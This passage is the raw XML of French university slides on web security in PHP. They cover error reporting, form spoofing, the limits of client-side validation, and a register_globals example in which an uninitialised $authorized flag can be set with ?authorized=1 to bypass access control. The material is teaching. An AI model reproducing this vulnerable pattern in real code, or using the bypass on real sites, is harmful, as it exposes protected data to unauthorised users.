          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du numéro de diapositive 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{76A6161C-92C9-4146-BF52-844985F175E1}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5E78ED8E-AC5B-45F7-A7C2-2BB9E2D9F7E2}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du pied de page 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8016D28A-0436-451E-8937-0D63AD71E430}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C8F5523E-396C-49AC-BE10-6067D2ED3491}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:16</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du pied de page 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du numéro de diapositive 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0719E9FB-EC99-4035-B97E-868E95D1D32B}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{22F0AF12-7A5F-4838-9B55-C13209965645}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du pied de page 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>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4377B3E6-BAB1-44B9-BF95-A5BE28EA6CFA}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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fld id="{AF43586B-07C5-4FCF-A3BA-A0DC553FA799}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</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r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Programmation Web 2014-2015</a:t>
            </a:r>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77C6FB3-E668-47E2-BDA3-E67E82A6C908}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" alt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4051" r:id="rId1"/>
    <p:sldLayoutId id="2147484052" r:id="rId2"/>
    <p:sldLayoutId id="2147484053" r:id="rId3"/>
    <p:sldLayoutId id="2147484054" r:id="rId4"/>
    <p:sldLayoutId id="2147484055" r:id="rId5"/>
    <p:sldLayoutId id="2147484056" r:id="rId6"/>
    <p:sldLayoutId id="2147484057" r:id="rId7"/>
    <p:sldLayoutId id="2147484058" r:id="rId8"/>
    <p:sldLayoutId id="2147484059" r:id="rId9"/>
    <p:sldLayoutId id="2147484060" r:id="rId10"/>
    <p:sldLayoutId id="2147484061" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="6000" dirty="0" smtClean="0"/>
              <a:t>M 521</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="6000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="6000" dirty="0" smtClean="0"/>
              <a:t>Web avancé</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Sous-titre 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-27384"/>
            <a:ext cx="9144000" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" sz="4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Master 1 Génie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" sz="4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Logiciel</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:tint val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Sous-titre 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-F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Signalement des erreurs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>error_reporting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(E_ALL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>display_errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> on off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>log_errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> on off</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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err="1" smtClean="0"/>
              <a:t>Register</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Globals</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>La directive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> est désactivée par défaut dans les versions 4.2.0 et supérieures de PHP. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>authenticated_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$authorized = true; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>if ($authorized) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>include '/highly/sensitive/data.php'; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>} ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Avec la directive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> activée, cette page peut être appelée avec ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>authorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>=1 dans la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> string, pour contourner le contrôle d'accès prévu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Solution : initialiser toutes les variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Formulaires</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>submissions</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Comment savoir si la requête provient bien du formulaire prévu, sans modification ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Impossible !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Une requête HTTP peut provenir :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>du formulaire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>naturel,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>d’une copie modifiée localement du formulaire,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>d’un script forgeant une requête sur mesure.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Cohérences des données : côté client</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Pour que les données du formulaire soient valides, on peut utiliser :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>maxwidth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>="5"&gt; pour limiter le nombre de caractères saisis,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>readonly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>readonly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt; pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>empêcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>modification,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;select&gt; pour imposer un choix parmi une liste.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> pour effectuer une validation fine côté client (expressions régulières, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> JS avec fonctions dédiées)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Aucun effet sur la sécurité !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les limitations JS et HTML ont pour seul but d’aider l’utilisateur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>La validation se fait sur le serveur.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Validation - Utilisation des données postées</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>if ( </a:t>
            </a:r>
            <a:r>
